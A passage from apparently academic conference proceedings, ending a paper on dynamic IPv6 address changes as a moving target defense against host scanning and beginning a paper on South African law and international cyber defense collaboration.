dynamic addressing technique must minimize overhead to be feasible for implementation. We analyze<br />

the factors that contribute to creating an effective dynamic addressing technique with the goal of<br />

determining the most efficient approach.<br />

4. Analysis of dynamic address factors<br />

There are three factors that contribute to an attacker’s ability to detect a target host on a subnet. The<br />

first factor is the number of dynamic bits in the address, which affects the size of the subnet. In a<br />

small address space, it is trivial for an attacker to check each address. The second factor is how often<br />

a target host’s address changes. If the address remains static, an attacker has as much time as<br />

necessary to locate the host. The third factor is the density of the address space, or the number of<br />

other hosts on an IP subnet. If an attacker does not know the target host’s address on a subnet,<br />

multiple other addresses will make identifying the target more difficult.<br />

For the purpose of our analysis, we investigate an attacker actively scanning an IP subnet with<br />

unicast addresses to identify a single targeted host. There are other methods an attacker can use to<br />

detect target hosts on a network. One such technique is a broadcast ping, allowed by IPv4. Many<br />

gateway devices block broadcast pings. Another method is to passively scan a subnet with a packet<br />

sniffer. This method has scope limitations as the attacker must have a presence on the same subnet<br />

as the target host. A unicast scan is more likely since there are multiple methods of scans that avoid<br />

common security measures implemented on networks.<br />

4.1 Size of address<br />

The larger the address space, the more time it takes an attacker, on average, to locate the target<br />

address on an IP subnet. Table 1 illustrates this by comparing subnets of various sizes. In the table,<br />

we use the three most common Internet Protocol version 4 (IPv4) classful address blocks as<br />

examples. We also compare the typical subnet size used in IPv6. Scanning an entire class C address<br />

space is trivial and can be accomplished in less than a minute while scanning an entire IPv6 subnet is<br />

currently infeasible.<br />

Table 1: Comparison of addresses of various sizes, the scan time is based on a sequential scan with<br />

a 150 millisecond average round trip time for a single packet (GLORIAD 2010)<br />

Address Type Address Size (bits) Address Size (hosts) Scan Time<br />

IPv4 Class C Subnet 8 256 38 sec<br />

IPv4 Class B Subnet 16 65,536 3 hrs<br />

IPv4 Class A Subnet 24 16,777,200 29 days<br />

IPv6 Subnet 64 1.845·10 19<br />

8.77·10 10 yrs<br />

So far we have mentioned the time it takes an attacker to scan the various address types in Table 1,<br />

however, this is the time it takes an attacker to scan the entire address space. The expected amount<br />

of time to locate a host is much less due to a paradox known as the birthday attack (Schneier 1996).<br />

According to the birthday attack, an attacker can expect to locate a target host in attempts where<br />

m is the number of bits in the address. What this means is that an attacker can expect to locate a host<br />

on a class C subnet in 2.4 seconds, a class B subnet in 38 seconds, and a class A subnet in 10<br />

minutes. A host on an IPv6 subnet can still expect to escape detection for over 73,500 years. No IPv4<br />

host that is not defending against active scanning can have any expectation of remaining hidden for a<br />

reasonable amount of time.<br />

4.2 Frequency of address change<br />

The more frequently an address changes, the more difficult it is, on average, for an attacker to<br />

successfully locate and target a specific address. This is particularly true if the address changes more<br />

rapidly than an attacker can scan the subnet. As mentioned in Section 4.1, a larger address space<br />

takes longer to scan. It follows that addresses on a larger subnet need to change less frequently. To<br />

understand the relationship between changing and non-changing addresses, we analyze the number<br />

of attempts it takes an attacker to locate a static address on a subnet. Since the address is static, the<br />

probability of an attacker guessing the address increases with each subsequent guess. This<br />

86


Stephen Groat et al.<br />

probability follows a hypergeometric distribution. In the case of locating specific hosts on a subnet, the<br />

probability can be written as:<br />

where N represents the total possible addresses in the subnet, h represents the target host(s), and r<br />

represents the number of guesses an attacker takes in an attempt to find the target address(es).<br />

The best case for the target host is if its address changes at the same rate that an attacker scans a<br />

single address. To provide the fairest assessment, we assume a scenario where the attacker is aware<br />

of the target host changing his/her address. As a result, the attacker randomizes his/her address<br />

guesses, allowing for repetition of addresses. This is in contrarst to the normal approach where an<br />

attacker exhaustively scans a subnet without repetition. The probability of detecting the target host<br />

using an exhaustive search is slightly lower due to the possibility of a host address changing to a<br />

previously guessed address. In the attacker-aware scenario, the probability of detecting the target<br />

host remains the same with each subsequent guess and follows a cumulative binomial distribution as<br />

shown in Equation 2<br />

where N again represents the total possible addresses in the subnet and r represents the attempt<br />

during which detections occurs. Figure 1 depicts the difference between the probabilities of a static<br />

address versus a changing address that follows a binomial distribution. A subnet of size 256 hosts is<br />

used as an example for this figure.<br />

Figure 1: The probability an attacker has of detecting a target address within r attempts, the solid line<br />

represents the probability given a static address while the dotted line represents the<br />

probability if the address is changed at the same rate it is scanned<br />

87<br />

(1)<br />

(2)


Stephen Groat et al.<br />

It is unlikely, however, that a target address will change at the same rate an attacker scans a subnet.<br />

A target host can decrease the probability of detection compared to a static address by changing its<br />

address more frequently than the time it takes an attacker to scan the entire subnet. In this scenario,<br />

we assume the attacker knows the frequency of the address changes. We make this assumption to<br />

provide the attacker with the highest probability of target detection, and thus demonstrate the worstcase<br />

scenario for the target host. In this scenario, the probability of detecting a target address follows<br />

Equation 1 until the address changes. After the address changes, Equation 1 resets to r=1. If we<br />

classify each address change as a round, the probability of detection on round z can be written as:<br />

Figure 2 also utilizes a subnet of 256 addresses. The plot illustrates the difference between a static<br />

address and addresses that changes after an attacker scans r addresses. The address that changes<br />

every round (r=1) follows a binomial distribution. The figure demonstrates that as the frequency of<br />

change approaches the time it takes an attacker to scan a single address, Equation 3 converges to<br />

Equation 2. Alternatively, as the attacker is able to scan more of the address space between address<br />

changes, Equation 3 converges to Equation 1.<br />

Figure 2: The probability an attacker has of detecting a static target address within 256 attempts<br />

versus the probability of detecting an address that changes after an attacker scans r<br />

addresses over z rounds<br />

4.3 Density of address space<br />

The more sparsely populated the address space is, the more difficult it is for an attacker to pinpoint<br />

the target host. The reason for this is that the attacker does not know the address of the target host. If<br />

the attacker knew the address, he/she would not need to scan the subnet. Assuming the attacker has<br />

no additional information pertaining to the identity of a host (e.g., operating system), a successful<br />

scan reply provides no indication of success.<br />

The probability of detecting a host increases with the number of hosts on a subnet. The probability of<br />

detecting a host can be calculated using Equation 1. In Section 4.2, h=1 to represent a single target<br />

88<br />

(3)


Stephen Groat et al.<br />

host. In this case, h is equal to the number of total hosts on the subnet. As already mentioned,<br />

successful detection does not indicate that the host detected is the target host.<br />

This factor degrades an attacker’s capability of detecting a target host. In the single host scenario<br />

discussed in Section 4.2, locating a target takes time. Once the target is located, though, the attacker<br />

knows he/she has identified the target host because there are no other hosts on the subnet. With<br />

multiple hosts on the subnet, an attacker will get false positives. By false positive, we mean indication<br />

of success is received by the attacker when the located host is not the target. The false positive rate<br />

increases with the number of non-target hosts on the subnet. Unlike a password attack where<br />

success provides an attacker access to a machine, a successful scan reply tells the attacker little<br />

about whether the discovered host is the target host. Even in the case of multiple discovered hosts,<br />

the attacker does not know which host is the target. Of course, with additional information, such as<br />

operating system or protocol, the attacker can filter out hosts not matching a certain profile.<br />

5. Interaction of dynamic address factors<br />

The three factors described in Section 4 are not independent. As certain factors increase, other<br />

factors can decrease while still maintaining the same overall probability of detection. For example,<br />

there is a relationship between address size and frequency of address change. There is also a<br />

relationship between subnet density and frequency of address change.<br />

Increasing the size of the address allows for the frequency of the address change to decrease without<br />

degrading security. As the size of the address increases linearly, the size of the address space<br />

increases exponentially. The increased address space requires more time and resources from an<br />

attacker to exhaustively scan. Beyond a certain address size, an attacker cannot exhaustedly scan<br />

the exponentially growing network quickly. Therefore, it is possible for the host to decrease the<br />

frequency of the address change without increasing the probability it will be detected. Since each<br />

address change requires computation on the part of the host, decreasing the frequency of address<br />

change is desirable. A larger address space can result in less computational requirements with the<br />

same probability of detection as that of a smaller address space with more frequent address changes.<br />

Density of address space also affects frequency of address change. As the density of the address<br />

space increases, the probability of correlating an address with a specific host decreases. The<br />

increased density occurs because more hosts populate the subnet. As mentioned in Section 4.3, a<br />

dense subnet results in a higher probability of an attacker detecting a host that is a false positive.<br />

Therefore, a targeted host can use the dense network to lower the probability of being detected.<br />

Density in the address space also has an inverse correlation to the possibility of address collisions. By<br />

address collision, we mean that a host changes its address to a pre-existing address on the subnet.<br />

Since each host must have a globally unique address to ensure connectivity, address collisions must<br />

be avoided on the subnet. Repeated address collisions could prevent a host from sending or receiving<br />

network traffic, thus decreasing throughput and Quality of Service (QoS). While increased density in<br />

the address space provides a host with a lower probability of detection, address space density must<br />

be balanced with the probability of address collisions to ensure network connectivity.<br />

Address size inversely correlates with the probability of address collisions. It is desirable to have a<br />

subnet populated by multiple hosts to increase the probability of an attacker finding a false positive.<br />

By increasing the address size, the address space increases. A larger address space allows for more<br />

hosts on the subnet without overpopulating the subnet. This means that a larger subnet can be less<br />

densely populated. The result is that a detected host still has the same probability of being a false<br />

positive while a host changing its address has a lower probability of an address collision.<br />

6. Simulation results<br />

To validate our analysis of changing addresses in Section 4.2, we simulated four different rates for<br />

addresses to change. The rates simulated were a static address (never changes) and addresses that<br />

changed after an attacker scanned 64 addresses (r=64), eight addresses (r=8), and one address<br />

(r=1). The simulation results are listed in Table 2. The table highlights four search intervals. The four<br />

intervals are 64, 128, 192, and 256 guesses. For each interval, a simulated attacker attempted to<br />

locate a target host with an 8-bit host address within the specified interval. Each interval was<br />

simulated for 100,000 iterations. The probability displayed is the average over the 100,000 iterations.<br />

The probabilities produced, match the calculated probabilities at each interval depicted in Figure 2.<br />

89


Stephen Groat et al.<br />

Table 2: Probability conducted in simulation of detecting a target host with an 8-bit address within 64,<br />

128, 192, and 256 guesses, each listed probability is the average over 100,000 iterations<br />

Probability of detection within:<br />

64 guesses 128 guesses 192 guesses 256 guesses<br />

Static Address 0.249 0.503 0.748 1<br />

0.248 0.435 0.578 0.682<br />

Changing Address (r64)<br />

Changing Address (r8)<br />

Changing Address (r1)<br />

7. Security through dynamic addressing<br />

0.225 0.398 0.533 0.637<br />

0.222 0.393 0.528 0.632<br />

Establishing a moving target defense is an effective way of protecting users’ privacy and data.<br />

Changing hosts’ addresses, referred to as dynamic addressing, enhances security. If target<br />

addresses continually change, an attacker loses the expectation of narrowing the search space with<br />

successive guesses. If the attacker is able to locate a targeted host, a dynamically changing host<br />

address limits the time an attacker has access to the host. Since the discovered address changes, the<br />

attacker no longer knows the host’s location on the network. Additionally, the nature of dynamic<br />

addressing prevents other types of targeted attacks, which rely on static addressing.<br />

Changing the addresses of hosts allows them to logically move within the address space or subnet.<br />

As illustrated in Figure 2, the more often an address changes, the more difficult it is to locate and<br />

target the host. A changing address, combined with other factors such as address size and subnet<br />

density, creates a moving target defense. A large address space supporting many hosts is sparsely<br />

populated making it difficult for an attacker to pinpoint a specific target host. Other network hosts<br />

result in false positives for an attacker while unoccupied address spaces reduces the possibility of<br />

address collisions. The incorporation of dynamic addressing considerably reduces the probability of<br />

detecting a target host while still maintaining connectivity.<br />

Dynamic addressing also protects against certain classes of network attacks. For example, an<br />

attacker attempting a targeted DoS attack first has to find the target host on the subnet. Even if the<br />

attacker finds the host, the attack is limited by the interval between address changes. Other targeted<br />

network attacks, such as session hijacking and man-in-the-middle, are constrained by the same<br />

limitations as DoS attacks. To attack dynamically addressed hosts, an attacker must be able to either<br />

quickly find the host after an address change or predict the address change. If a sufficiently<br />

randomized dynamic address obscuration algorithm is utilized, targeting hosts in a large address<br />

space should not be possible.<br />

Providing security at the network layer also provides transitive security against attacks and exploits at<br />

layers above the network layer since many other attacks rely on network transmissions. The majority<br />

of application layer security flaws are exploited by either taking control of a system or transferring<br />

sensitive information back to an attacker. By securing the network layer, even if an attacker is able to<br />

identify a valid vector of attack on an application, the window for attack is limited by the frequency of<br />

the address change. Once the address changes, the attacker loses any existing vector to control the<br />

remote host. The attacker must then locate the host to reestablish the connection.<br />

8. Future work<br />

The next phase of our research works to develop a sufficiently randomized algorithm for dynamically<br />

obscuring IP addresses. Our goal is to produce an approach that dynamically changes IP addresses<br />

multiple times within a single session. By changing addresses multiple times within a single session,<br />

an attacker will have more difficulty locating target hosts. Even if an attacker locates the host,<br />

90


Stephen Groat et al.<br />

changing addresses multiple times within a session prevents the attacker from capturing enough<br />

network traffic to correlate the nature of a communication between two hosts.<br />

Our particular approach leverages IPv6. As eluded to in Section 4.1, current methods for locating a<br />

target address in an IPv6 subnet are infeasible in a reasonable amount of time. The immense IPv6<br />

address space will also likely be sparsely populated. As discussed in Section 4.3, locating any host in<br />

a sparsely populated address space is probabilistically difficult. In addition to the difficulty of locating<br />

hosts in a sparsely populated subnet, hosts using a dynamic addressing scheme can reasonably<br />

expect not to collide with occupied addresses when rotating their addresses. In order to achieve a<br />

reasonable dynamic addressing algorithm in IPv4, hosts would have to draw from a pool of unused<br />

addresses. Reserving pools of addresses are more difficult with the depletion of the IPv4 address<br />

space (NRO 2010). Additionally, an IPv4 pool of addresses, regardless of how large, would be almost<br />

trivial for an attacker to scan. To achieve a sufficiently randomized dynamic addressing algorithm, we<br />

plan to repeatedly use a cryptographic hash function to obscure the 64-bit interface identifier that<br />

makes up the subnet portion of an IPv6 address. By using a cryptographic hash function, malicious<br />

hosts cannot feasibly predict the dynamic address (Schneier 1996). Since hosts in IPv6 can generate<br />

and advertise their own addresses (Thomson, Narten & Jinmei 2007), obscuration is kept local.<br />

Localizing obscuration reduces the possibility of a malicious host performing any type of address<br />

hijacking or man-in-the-middle attack. It also reduced the computational overhead that address<br />

generation servers would incur.<br />

9. Conclusion<br />

As users exchange more personally identifiable information over the Internet, it is increasingly<br />

important to protect users’ security and privacy. One of the best ways to accomplish this is through<br />

the use of a moving target defense. At the network layer, this can be achieved by dynamically<br />

changing host IP addresses. Frequently changing addresses are probabilistically more difficult to<br />

detect than static addresses. Dynamic addresses also provide an additional layer of security for hosts<br />

that are detected by an attacker. An attacker is unable to compromise hosts for a significant period of<br />

time since the hosts’ network address changes. Dynamically changing addresses provide security and<br />

privacy by creating a moving target solution implementable as low as the network layer of the protocol<br />

stack.<br />

References<br />

Bagnulo, M., & Arkko, J. October 2006. Cryptographically Generated Addresses (CGA) Extension Field Format.<br />

RFC 4581 (Proposed Standard).<br />

Dunlop, M., Groat, S., Marchany, R., & Tront, J., 23-28 January 2011. ‘IPv6: Now You See Me, Now You Don't’,<br />

Proceedings of the Tenth International <strong>Conference</strong> on Networks (ICN 2011), St. Maarten, The Netherlands<br />

Antilles.<br />

Fink, R. A., Brannigan, M. A., Evans, S. A., Almeida, A. M., & Ferguson, S. A. 9 May 2006. Method and<br />

Apparatus for Providing Adaptive Self-Synchronized Dynamic Address Translation, United States Patent<br />

No. US 7,043,633 B1.<br />

GLORIAD. 2010. GLORIAD Average Round Trip Time - Last Week. [Online] Available<br />

http://www.gloriad.org/gloriad/monitor/stats/avg_round_trip_time.week.html. [11 October, 2010].<br />

Johnson, P. C., Kapadia, A., Tsang, P. P., & Smith, S. W. 2007. ‘Nymble: Anonymous IP-Address Blocking’,<br />

Privacy Enhancing Technologies Symposium (PET '07), Ottawa, Canada, pp.113-133.<br />

Koukis, D., Antonatos, S., & Anagnostakis, K. 2006. On the Privacy Risks of Publishing Anonymized IP Network<br />

Traces. Communications and Multimedia Security, 4237: 22-32.<br />

Narten T., Draves, R., & Krishnan, S. September 2007. Privacy Extensions for Stateless Address<br />

Autoconfiguration in IPv6. RFC 4941 (Draft Standard).<br />

NRO. 2010. Remaining IPv4 address space drops below 5%. [Online] Available http://www.nro.net/<br />

media/remaining-ipv4-address-below-5.html, [7 November, 2010].<br />

Reiter, M., & Rubin, A. ‘Anonymous Web Transactions with Crowds’, Communications of the ACM, vol. 42, no. 2,<br />

pp. 32-48.<br />

Schneier, B. 1996. Applied Cryptography: Protocols, Algorithms, and Source Code in C. (2 nd Edition. New York:<br />

Wiley.<br />

Sheymov, V. I. 18 February, 2010. Method and Communications and Communication Network Intrusion<br />

Protection Methods and Intrusion Attempt Detection System, United States Patent No. US 2010/0042513<br />

A1.<br />

Shields, C., & Levine, B. N. 2000. ‘A protocol for anonymous communication over the Internet’, Proceedings of<br />

the 7th ACM conference on Computer and communications security, Athens, Greece, pp. 33-42.<br />

Thomson, S., Narten T., & Jinmei, T. September 2007. IPv6 Stateless Address Autoconfiguration. RFC 4862<br />

(Draft Standard).<br />

91


Changing the Face of Cyber Warfare with International<br />

Cyber Defense Collaboration<br />

Marthie Grobler 1 , Joey Jansen van Vuuren 1 and Jannie Zaaiman 2<br />

1<br />

Council for Scientific and Industrial Research, Pretoria, South Africa<br />

2<br />

University of Venda, South Africa<br />

mgrobler1@csir.co.za<br />

jjvvuuren@csir.co.za<br />

jannie.zaaiman@univen.ac.za<br />

Abstract: The international scope of the internet and global reach of technological usage requires the South<br />

African legislative system to address issues related to the application and implementation of international<br />

legislation. However, legislation in cyberspace is rather complex since the technological revolution and dynamic<br />

technological innovations are often not well suited to any legal system. A further complication is the lack of<br />

comprehensive international cyber defense cooperation treaties. The result is that many countries are not<br />

properly prepared, nor adequately protected by legislation, in the event of a cyber attack on a national level. This<br />

article will address the international cyber defense collaboration problem by looking at the impact of technological<br />

revolution on warfare. Thereafter, the article will evaluate the South African legal system with regard to<br />

international cyber defense collaboration. It will also look at the influence of cyber defense on the international<br />

position of the Government, as well as cyber security and cyber warfare acts and the command and control<br />

aspects thereof. The research presented is largely theoretical in nature, focusing on recent events in the public<br />

international domain.<br />

Keywords: collaboration, cyber defense, legislation, government responsibility<br />

1. Introduction<br />

The international scope of the internet and global reach of technological usage requires the South<br />

African legislative system to address issues related to the application and implementation of<br />

international legislation. However, the complexities of cyberspace and the dynamic nature of<br />

technology innovations requires a cyber defense framework that is not well suited to any current legal<br />

system. A further complication is the lack of comprehensive international cyber defense cooperation<br />

treaties, resulting in many countries not being properly prepared, or adequately protected by<br />

legislation, in the event of a cyber attack on a national level.<br />

For the purpose of this article, cyber warfare is defined as the use of exploits in cyber space as a way<br />

to intentionally cause harm to people, assets or economies (Owen 2008). It can further be defined as<br />

the use and management of information in pursuit of a competitive advantage over an opponent,<br />

involving "the collection of tactical information, assurance that one’s own information is valid,<br />

spreading of propaganda or disinformation among the enemy, undermining the quality of opposing<br />

force information and denial of service or of information collection opportunities to opposing forces"<br />

(Williams & Arreymbi 2007).<br />

The article will address some of the aspects related to changing the face of cyber warfare, focusing<br />

specifically on international cyber defense collaboration. It will look at some international technological<br />

revolutions that had an impact on the international legal scope and briefly evaluate the South African<br />

legal system with regard to international cyber defense collaboration. The article will also address<br />

international cyber warfare and the influence of cyber defense on the international position of the<br />

Government. The article will conclude with recommendations on working towards international cyber<br />

defense collaboration.<br />

2. Technological revolutions' impact on warfare<br />

Modern society created both a direct and indirect dependence on information technology, with a<br />

strong reliance on immediacy, access and connections (Williams & Arreymbi 2007). As a result, a<br />

compromise of the confidentiality, availability or integrity of the technological systems could have<br />

dramatic consequences regardless of whether it is the temporary interruption of connectivity, or a<br />

longer-term disruption caused by a cyber attack (Warren 2008).<br />

Battlespace, as implied by military use and warfare, is becoming increasingly difficult to define since<br />

advances in technology revolutionized the act of war. "Today, cyber attacks can target political<br />

92


Marthie Grobler et al.<br />

leadership, military systems, and average citizens anywhere in the world, during peacetime or war,<br />

with the added benefit of attacker anonymity. The nature of a national security threat has not<br />

changed, but the Internet has provided a new delivery mechanism that can increase the speed,<br />

diffusion, and power of an attack." (Geers ND). Although the physical destruction of the internet<br />

infrastructure as a result of cyber warfare is unlikely, a number of technological exploits can be<br />

employed as part of a cyber warfare attack aimed at financial loss. These exploits include:<br />

Probes - an attempt to gain access to a system;<br />

Scans - many probes done using an automated tool;<br />

Account compromise - hacking, or the unauthorized use of a computer account;<br />

Root compromise - compromise of an account with system administration privileges;<br />

Packet sniffing - capturing data from information as it travels over a network;<br />

Denial of service (DoS) attacks - deliberate consuming of system resources to deny; and<br />

Malicious programs and malware - hidden programs that causes unexpected, undesired results<br />

on a system (Owen 2008).<br />

Technological revolutions in computers and electronics make major advances in weapons and<br />

warfare possible. It also extends to areas such as information processing and networks,<br />

communications, robotics and advanced munitions (O'Hanlon 2000). Technological revolutions enable<br />

countries to prepare offensive and defensive strategies in cyber space.<br />

3. Evaluating the South African legal system with regard to international cyber<br />

defense collaboration<br />

From recent activity, it is clear that both the South African Government, the defense environment and<br />

the business environment are becoming increasingly aware of the threats and implications enabled by<br />

the use of the cyber environment. It is also clear that the threats are becoming more sophisticated<br />

and advanced when used as an element of cyber warfare and cyber crime.<br />

The internet is increasingly becoming more volatile and insecure. In fact, cyber terrorists have the<br />

capability to shut down South Africa’s power, disrupt financial transactions, and commit crimes to<br />

finance their physical operations. Organized crime is also increasingly making use of the internet as a<br />

means of communication and financial gain. Therefore, South Africa needs a national cyber defense<br />

system to which everybody must obey.<br />

3.1 The South African legal system<br />

Over the past decade, South Africa has taken the first steps to protect its information. It has passed<br />

legislation starting with the South African Constitution of 1996, which protects privacy, and the ECT<br />

(Electronic Communications and Transactions) Act of 2002, which provides for the facilitation and<br />

regulation of electronic communications and transactions (ECT 2002).<br />

In 2000, the PAIA (Promotion of Access to Information Act) No 2 as amended, was passed to give<br />

effect to Section 32 of the Constitution, subject to justifiable limitations (PAIA Act 2000). These<br />

limitations are aimed at the reasonable protection of privacy, commercial confidentiality and good<br />

governance in a manner that balances the right of access to information with any other rights,<br />

including the rights in the Bill of Rights in Chapter 2 of the Constitution (SA Constitution 1996). Linked<br />

to this Act is the PAIA Reg 187 Regulations regarding the promotion of information of access to<br />

information (Government Gazette 2003).<br />

In 2002, the RIC (Regulation of Interception of Communications and Provision of Communicationrelated<br />

information) Act was passed to regulate the interception of certain communications, the<br />

monitoring of certain signals and radio frequency spectrums and the provision of certain<br />

communication-related information. This Act also regulates the making of applications for, and the<br />

issuing of, directions authorizing the interception of communications and the provision of<br />

communication-related information under certain circumstances (RIC Act 2002).<br />

Towards the end of 2009, the South African Government passed two bills, namely the:<br />

93


Marthie Grobler et al.<br />

PPI (Protection of Personal Information) Bill that introduces brand new legislation to ensure that<br />

the personal information of individuals is protected, regardless of whether it is processed by public<br />

or private bodies (Giles 2010).<br />

Information Bill that is meant to replace an existing piece of legislation, the Protection of<br />

Information Act of 1982. It deals with the protection of State information and empowers the<br />

government to classify certain information in order to protect the national interest from suspected<br />

espionage and other hostile activities (Republic of South Africa 2010).<br />

Playing an important role in the South African legal system is international standards. ISO/IEC 27002<br />

is an information security standard published by the International Organization for Standardization<br />

(ISO) and the International Electrotechnical Commission (IEC), originally published as ISO/IEC<br />

17799:2005. It is entitled Information technology - Security techniques - Code of practice for<br />

information security management. This standard has been accepted by and adopted in South Africa<br />

(International Standards Organization 2008).<br />

South Africa has also adopted the Council of Europe Cyber Crime Treaty in Budapest in 2001 but has<br />

not ratified it yet. The treaty contains important provisions to assist law enforcement in their fight<br />

against transborder cyber crime. Therefore, it is imperative that South Africa ratifies the cyber crime<br />

treaty to avoid becoming an easy target for international cyber crime. The ratification will hopefully be<br />

done soon, although the South African government seems to be presently focused on basic service<br />

delivery and more traditional crimes given the current local crime situation. However, steps to<br />

establish the Computer Security Incident Response Team (CSIRT) indicate that the aim to tackle<br />

cybercrime is gathering momentum.<br />

3.2 The South African position on international cyber defense collaboration<br />

In February 2010, South Africa published a draft Cyber security policy that would set a framework for<br />

the creation of relevant structures, boost international cooperation, build national capacity and<br />

promote compliance with appropriate cyber crime standards. Over the last five years, South Africa<br />

focused on modernizing and expanding information technology equipment, applications, and<br />

centralized hosting capabilities and network infrastructure. This was done as part of its strategy to<br />

fully modernize and integrate the national criminal justice system to the maximum benefit of society<br />

and at minimum cost to crime prevention agencies. This policy has not been adopted, but provides a<br />

first step from South Africa towards international cyber defense collaboration.<br />

During a more recent attempt to international cyber defense collaboration, South Africa participated in<br />

the 12 th United Nations Congress on Crime Prevention and Criminal Justice in Salvador, Brazil during<br />

April 2010. During this congress, delegates considered the best possible responses to cyber crime as<br />

the Congress Committee took up the dark side of advances in Information Technology. While<br />

advances in information technology held many benefits for society, its dark underside (computerbased<br />

fraud and forgery, illegal interception of private communications, interference with data and<br />

misuse of electronic devices) requires States to develop an organized, international response.<br />

Speakers at the congress remained undecided about the nature of the required response, with<br />

supporters of the Council of Europe’s Budapest Convention on crime suggesting an expansion of the<br />

treaty, and others suggestion new multilateral negotiations (UN Information Officer 2010).<br />

In general, governments are having a tough time keeping pace, and their responses to cyber crime is<br />

sadly lacking. In many countries, cyber crime damage economies and State credibility and further<br />

impede national development. Cooperation in stamping cyber crime and protecting countries against<br />

cyber warfare is vital at all levels of defense, law enforcement, the judiciary and the private sector.<br />

According to Markoff (2010), a group of cyber security specialists and diplomats, representing 15<br />

countries (including South Africa) has agreed on a set of recommendations to the United Nations'<br />

Secretary General for negotiations on an international computer security treaty. In recent years, an<br />

explosion in cyber crime has been accompanied by an arms race in cyber weapons, as dozens of<br />

nations have begun to view computer networks as arenas for espionage and warfare. The<br />

recommendations to the United Nations from the specialists and diplomats reflect an effort to find<br />

ways to address the dangers of the anonymous nature of the Internet, as in the case of the object of a<br />

cyber attack misconstruing the identity of the attacker. Among the troubling issues is the existence of<br />

proxies. The report also suggests that “the same laws that apply to the use of kinetic weapons should<br />

94


Marthie Grobler et al.<br />

apply to state behavior in cyber space.” (Markoff 2010). The report recommends five steps to improve<br />

international cyber cooperation and security:<br />

Having more discussions about the ways different nations view and protect their computer<br />

networks, including the Internet;<br />

Discussing the use of computer and communications technologies during warfare;<br />

Sharing national approaches on legislation about computer security;<br />

Finding ways to improve the Internet capacity of less developed countries; and<br />

Negotiating to establish common terminology to improve the communications about computer<br />

networks (Markoff 2010).<br />

The signers of the report are major cyber powers and of other nations: the United States, Belarus,<br />

Brazil, Britain, China, Estonia, France, Germany, India, Israel, Italy, Qatar, Russia, South Africa and<br />

South Korea. From a legal perspective, a number of concerns can be identified, such as:<br />

Lack of collaboration between industry and the defense environment;<br />

Capacity of the legal fraternity to comprehend the complexity of the cyber environment and to<br />

deliver a verdict based on a thorough understanding of the facts;<br />

Collaboration between countries and the agreements on protocols;<br />

Lack of collaboration between State Departments on cyber warfare and cyber crime;<br />

Lack of collaboration between municipalities, districts, regions and provinces; and<br />

Lack of collaboration between urban and tribal authorities.<br />

Networked computers now control everything, including bank accounts, stock exchanges, power<br />

grids, the defence, the justice system and government. Networked computers also control all health<br />

records and crucial personal data. From a single computer an entire nation can be brought down. The<br />

authors are of the opinion that a series of regional conferences with all stakeholders involved and<br />

sponsored by private sector should be conducted. Significant progress has been made in South<br />

Africa, but commitments are required to draft a comprehensive Charter for South Africa and its unique<br />

situation.<br />

4. International cyber warfare<br />

The North Atlantic Treaty Organization (NATO) is only just beginning to recognize that the Internet<br />

has become a new battleground that also requires a military strategy. To counter such threats, a<br />

group of NATO members established a cyber defense centre in Tallinn. The 30 staffers at the<br />

Cooperative Cyber Defense Centre of Excellence analyze emerging viruses and other threats and<br />

pass on alerts to sponsoring NATO governments. Experts on military, technology, law and science<br />

are wrestling with such questions as: what qualifies as a cyber attack on a NATO member, and so<br />

triggers the obligation of alliance members to rush to its defense; how can the alliance defend itself in<br />

cyber space? Answers to these questions are strikingly different: Washington creates new funds for<br />

cyber defenses; Estonia is aiming to create a nation of citizens alert and wise to online threats (NATO<br />

ND).<br />

The choice of Estonia as the home to NATO’s new cyber war brain trust is not accidental. In 2007,<br />

Estonia suddenly found itself in the midst of cyber attacks. The fact that this happened in Estonia, a<br />

proud digital society, was eye opening. Back in 2007, Estonia’s minister of defense stated that the<br />

attacks cannot be treated as hooliganism, but as an attack against the State. Nevertheless, no troops<br />

crossed Estonia’s borders, and there was nothing that could be regarded as a conventional conflict.<br />

The United States clearly wants to take a military strategy approach. Estonia, on the other hand,<br />

prefers to demilitarize the issue by educating citizens on how to identify risks and promote a culture of<br />

cyber security, starting with schoolchildren. The Estonians have the right idea. A society of savvy<br />

citizens is the best defense (Geers ND).<br />

In response to the cyber attacks on Estonia in 2007 and Georgia, NATO set up a coordinated cyber<br />

defense policy with a quick-reaction cyber team on permanent standby. This, however, has not<br />

stopped the constant attack on NATO computers (Gardner 2009).<br />

95


Marthie Grobler et al.<br />

5. Influence of cyber defense on the international position of Governments<br />

The opinion of international Department of Defense (DOD) officials is that cyber space is a domain<br />

available for warfare, similar to air, space, land, and sea (Wilson 2007). As a result, any cyber attacks<br />

can have either a direct or an indirect influence on the DOD. Accordingly, the DOD needs to consider<br />

the potential effects of an emerging military-technological revolution that will have profound effects on<br />

the way wars are fought. Growing evidence exists that over the next several decades, the military<br />

systems and operations will be superseded by new, far more capable means and methods of warfare<br />

by new or greatly modified military organizations (Krepinevich 2003).<br />

The DOD views information itself as both a weapon and a target in warfare. In addition, it provides the<br />

ability to disseminate persuasive information rapidly in order to directly influence the decision making<br />

of diverse audiences. By incorporating the cyber domain in the cyber defense structure, a number of<br />

new aspects come into play that may have an influence on the manner in which the DOD reacts to<br />

cyber attacks:<br />

New national security policy issues;<br />

Consideration of psychological operations used to affect friendly nations or domestic audiences;<br />

and<br />

Possible accusations against the State of war crimes if offensive military computer operations or<br />

electronic warfare tools severely disrupt critical civilian computer systems, or the systems of noncombatant<br />

nations (Wilson 2007).<br />

An example of the last bullet point: if wrongful acts are committed inside a country, the State can be<br />

held responsible for these acts, since the State is obliged to fulfill the interest of the entire<br />

international community. If a representative of a State organ or a private person acting on the State's<br />

behalf committed an act, the act may be attributed to the State (Article 3 ILC Draft Articles). The<br />

physical location of a computer or hardware used in a cyber attack does not (and should not) allow for<br />

attributing that cyber attack to a particular State. Such an assumption would be greatly unjustified,<br />

since a State does not carry the responsibility for actions of its residents operating hardware located<br />

within its territory.<br />

The State, however, can be held responsible in the light of existing international law doctrine, for a<br />

breach of an international obligation. This obligation relates not to actions but to omissions, i.e. for not<br />

preventing that attack to take place. This interpretation is derived from the wording of Article 14(3) of<br />

the International Law Commission (ILC) Draft Articles, which provides that a State may be held<br />

responsible for the conduct of organs of an insurrectional movement, if such an attribution is<br />

legitimate under international law. The State has therefore an obligation to show best efforts, and to<br />

take all “reasonable and necessary” measures in order to prevent a given incident to happen. The<br />

occurrence of this obligation was best reflected in the International Court of Justice (ICJ) case<br />

concerning the United States diplomatic and consular staff in Teheran. In its decision, the ICJ found<br />

that the overriding of the United States embassy in Teheran does not free Iran from the responsibility<br />

for that incident, although it also cannot be attributed to Iran (Kulesza 2010).<br />

